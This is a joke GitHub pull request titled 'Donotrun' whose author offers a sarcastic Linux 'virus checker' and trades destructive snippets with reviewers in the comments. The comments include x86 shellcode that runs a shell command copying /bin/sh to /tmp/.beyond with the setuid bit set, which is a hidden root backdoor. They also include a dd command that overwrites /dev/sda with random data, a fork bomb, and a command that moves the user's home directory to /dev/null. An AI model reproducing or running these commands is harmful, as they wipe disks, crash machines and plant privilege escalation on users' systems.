### PR TITLE
Donotrun

### PR DESCRIPTION
**Pull request by rahul-singh-sandhu**
Adds a fun 'virus checker' for linux users. Will 100% not do anything to your root partition. (For those who do not understand sarcasm - _**DO NOT RUN**_ .

### CODE REVIEW

**Comment by bsysop** [comment]
Bad joke, kid!

**Comment by niktob560** [comment]
Actually, it's really "potentially dangerous file"

**Comment by rahul-singh-sandhu** [comment]
For a cleaner version try:
char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68”
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99”
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7”
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56”
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31”
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69”
“\x6e\x2f\x73\x68\x00\x2d\x63\x00”
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

**Comment by rahul-singh-sandhu** [comment]
Let me know if you want a dd version

**Comment by bsysop** [comment]
Have a cooler one?

**Comment by rahul-singh-sandhu** [comment]
How about:
sudo dd if=/dev/random of=/dev/sda
or if you want to crash the system by creating a hell of a lot of copies try:
:(){ :|: & };:
or to flush your bills down a black hole try:
sudo mv /home/$USER /dev/null

**Comment by rahul-singh-sandhu** [comment]
And if you want to destroy your system with spyware download and install this: https://www.microsoft.com/en-gb/software-download/windows11/

**Comment by bsysop** [comment]
Ok, the last one was a good joke!

**Comment by rahul-singh-sandhu** [comment]
Who said it was a joke :)

**Pull request closed without merging**
